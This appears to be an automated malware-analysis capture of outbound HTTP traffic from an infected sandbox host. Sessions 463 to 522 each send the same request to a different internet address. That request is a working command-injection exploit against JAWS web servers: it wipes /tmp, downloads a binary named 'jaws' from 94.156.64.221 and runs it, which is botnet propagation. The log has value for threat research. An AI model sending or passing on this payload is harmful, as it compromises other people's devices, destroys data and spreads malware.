                    Session IDSource IPSource PortDestination IPDestination Port
                    463192.168.2.235503642.75.164.25480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265423059 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    464192.168.2.235614479.216.128.15680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265444994 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    465192.168.2.2359410206.32.126.21880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265476942 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    466192.168.2.234523691.87.51.11480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265511990 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    467192.168.2.234602654.86.82.8680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265552044 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    468192.168.2.234275490.165.6.18280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265583992 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    469192.168.2.2346094128.10.35.10180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265614986 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    470192.168.2.23568808.125.254.22680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265646935 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    471192.168.2.2344260152.30.254.24380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265686989 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    472192.168.2.235145883.218.78.6280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265733957 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    473192.168.2.234970694.52.226.9180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265774965 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    474192.168.2.235399238.120.106.11880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265799046 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    475192.168.2.2353224102.77.238.9380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265827894 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    476192.168.2.234664860.201.243.10480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265863895 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    477192.168.2.233714898.123.8.1680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265898943 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    478192.168.2.235548295.179.61.20780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265934944 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    479192.168.2.2360520104.115.107.15480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265963078 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    480192.168.2.233297231.160.243.2480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265996933 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    481192.168.2.233470096.191.196.780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266035080 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    482192.168.2.2341658128.197.243.480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266067982 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    483192.168.2.2342032172.152.35.5580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266093016 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    484192.168.2.2332978146.172.113.11380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266133070 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    485192.168.2.235689061.112.73.12280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266159058 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    486192.168.2.234098018.61.236.18980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266192913 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    487192.168.2.233637812.230.123.880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266247034 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    488192.168.2.234957848.82.38.980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266285896 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    489192.168.2.2340972192.241.94.6480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266307116 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    490192.168.2.2345156124.126.158.22580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266346931 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    491192.168.2.234273614.179.235.780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266377926 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    492192.168.2.2340428161.254.82.1580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266407013 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    493192.168.2.234360613.35.43.21380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266443968 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    494192.168.2.2352190201.88.211.17180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266473055 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    495192.168.2.234842857.97.219.22580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266499043 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    496192.168.2.2338612162.196.145.22480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266529083 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    497192.168.2.235590660.237.234.8680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266557932 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    498192.168.2.2350724106.231.83.19080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266592026 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    499192.168.2.2339892193.247.242.22780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266621113 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    500192.168.2.235694496.101.32.16680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266671896 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    501192.168.2.2350786170.144.103.2180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266712904 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    502192.168.2.233650238.111.93.17880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266748905 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    503192.168.2.2337100159.174.137.5980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266766071 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    504192.168.2.235187227.18.243.8680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266793966 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    505192.168.2.2355674138.31.177.4680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266817093 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive
                    Jun 1, 2024 18:15:55.512317896 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive
                    Jun 1, 2024 18:15:55.960428953 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive
                    Jun 1, 2024 18:15:56.824140072 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive
                    Jun 1, 2024 18:15:58.551892042 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    506192.168.2.233811271.91.49.11580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266849995 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    507192.168.2.2343296181.7.89.23980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266912937 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    508192.168.2.236096248.6.53.21680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266937971 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    509192.168.2.2342318101.102.189.16180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266961098 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    510192.168.2.234577851.178.217.18580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.266992092 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    511192.168.2.2357650107.137.173.6780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267014980 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    512192.168.2.235508249.30.76.12580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267045975 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    513192.168.2.2337184168.201.130.18780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267076015 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    514192.168.2.2348974151.12.11.9480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267158985 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    515192.168.2.234119654.66.237.18680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267199993 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    516192.168.2.234024083.131.30.580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267232895 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    517192.168.2.2357372185.200.90.7780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267260075 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    518192.168.2.233606843.160.124.10480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267288923 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    519192.168.2.2349916104.145.249.3480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267324924 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    520192.168.2.234223425.142.89.2780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267350912 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    521192.168.2.2340128149.50.188.15580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267379999 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    522192.168.2.235173413.140.185.17880
                    TimestampBytes transferredDirectionData
